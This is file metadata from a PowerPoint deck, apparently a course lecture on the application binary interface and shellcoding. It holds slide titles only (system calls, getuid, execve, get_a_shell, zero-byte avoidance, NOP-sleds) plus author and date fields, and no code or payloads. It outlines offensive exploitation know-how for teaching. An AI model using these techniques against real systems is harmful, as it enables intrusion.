      <vt:lpstr>Application Binary Interface (ABI):  How a Binary Runs on Computers</vt:lpstr>
      <vt:lpstr>Application Binary Interface (ABI)</vt:lpstr>
      <vt:lpstr>Application Binary Interface (ABI)</vt:lpstr>
      <vt:lpstr>System Calls </vt:lpstr>
      <vt:lpstr>Invoking getuid(): x86 </vt:lpstr>
      <vt:lpstr>Invoking getuid(): AMD64</vt:lpstr>
      <vt:lpstr>Inline Assembly</vt:lpstr>
      <vt:lpstr>Shellcoding</vt:lpstr>
      <vt:lpstr>NO “get_a_shell()”?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>get_a_shell()</vt:lpstr>
      <vt:lpstr>get_a_shell(): setregid()</vt:lpstr>
      <vt:lpstr>get_a_shell()</vt:lpstr>
      <vt:lpstr>Calling getegid(), setregid()</vt:lpstr>
      <vt:lpstr>Calling execve()</vt:lpstr>
      <vt:lpstr>Writing Shellcode</vt:lpstr>
      <vt:lpstr>How to Launch Shellcode?</vt:lpstr>
      <vt:lpstr>Loading You Payload </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Shellcode with Zero-bytes</vt:lpstr>
      <vt:lpstr>Shellcode with Zero-bytes</vt:lpstr>
      <vt:lpstr>Shellcode with Zero-bytes</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Running Shellcode</vt:lpstr>
      <vt:lpstr>NOP-sled</vt:lpstr>
      <vt:lpstr>NOP-sled Trick</vt:lpstr>
      <vt:lpstr>Useful Assembler Directives for GNU Assembler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Jee, Kangkook</dc:creator>
  <cp:lastModifiedBy>Jee, Kangkook</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <cp:lastPrinted>2021-09-06T21:34:06Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-12T20:07:39Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-17T16:51:26Z</dcterms:modified>
</cp:coreProperties>
</file>